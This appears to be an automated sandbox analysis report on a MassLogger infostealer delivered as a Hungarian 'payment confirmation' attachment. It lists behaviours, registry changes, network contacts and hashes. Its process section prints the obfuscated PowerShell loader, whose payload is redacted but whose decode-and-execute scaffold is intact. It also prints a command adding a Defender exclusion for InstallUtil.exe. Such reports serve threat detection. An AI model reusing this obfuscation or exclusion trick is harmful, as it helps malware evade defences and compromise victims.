Analysis Overview
SHA256
2479411adb58bd76f54b991f75232058de6c387f7fe639bc66c13731ec81dff8
Threat Level: Known bad
The file fizetési igazolás.eml.msg was found to be: Known bad.
Malicious Activity Summary
MassLogger Main Payload
MassLogger
Process spawned unexpected child process
Blacklisted process makes network request
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2020-12-01 08:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2020-12-01 08:08
Reported
2020-12-01 08:10
Platform
win7v20201028
Max time kernel
55s
Max time network
147s
Command Line
Signatures
MassLogger
MassLogger Main Payload
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Blacklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{47DF8E31-33B4-11EB-AA5C-E6A19248D3FE} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1512 wrote to memory of 1356 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fizetési_visszaigazolás.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $yquAX='<encoded payload removed>';$text =$yquAX.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('!') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:275457 /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | rocadatrans.ro | udp |
| N/A | 84.247.61.4:80 | rocadatrans.ro | tcp |
| N/A | 8.8.8.8:53 | go.microsoft.com | udp |
| N/A | 8.8.8.8:53 | ieonline.microsoft.com | udp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.225.66.103:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | crl.verisign.com | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\11OV1DRW.txt
| MD5 | fc275e9a2a7b9b79a696d7b97cfad786 |
| SHA1 | 61d23d8d9c06a97adf9d57163dbe5a2fffcc3e42 |
| SHA256 | 91b352dcfbe19d7d8f997b5479a6550df8698b77741e72b3a49d876a53fe5d0d |
| SHA512 | 28bcd15ade65b38580041e1e8976143f5f6137a43566b9343fdc2d96677e7f227b2de835b74b31d801ab829899fddbd501d38c5a66898918bcc92d14349b1b9f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | d50a3c9affa214174d8fc3b762083a0e |
| SHA1 | 03f0f759ac9f6d4232e1a90e87bc2a6019f9a87a |
| SHA256 | 973712d528f35646cc068dfdb748153dd34d9fe9a0b727cffad79a7c4e3e9e78 |
| SHA512 | e801471ef7847d1ff69eb587e9d2a8e04cbf9dd9ff2541abd94cdb81f166c9d2f6862d6766fe87e55630ae124fdd1322430053970fedff3f55fdf71a6ca567e0 |
Analysis: behavioral2
Detonation Overview
Submitted
2020-12-01 08:08
Reported
2020-12-01 08:10
Platform
win10v20201028
Max time kernel
10s
Max time network
113s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Blacklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fizetési_visszaigazolás.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $yquAX='<encoded payload removed>';$text =$yquAX.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('!') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
Network
| Country | Destination | Domain | Proto |
| N/A | 52.109.8.21:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | rocadatrans.ro | udp |
| N/A | 84.247.61.4:80 | rocadatrans.ro | tcp |
Files
memory/756-2-0x0000021282780000-0x0000021282784000-memory.dmp
memory/1548-3-0x00007FFFD2630000-0x00007FFFD301C000-memory.dmp
memory/1548-4-0x000001275CF30000-0x000001275CF31000-memory.dmp
memory/1548-5-0x000001275F100000-0x000001275F101000-memory.dmp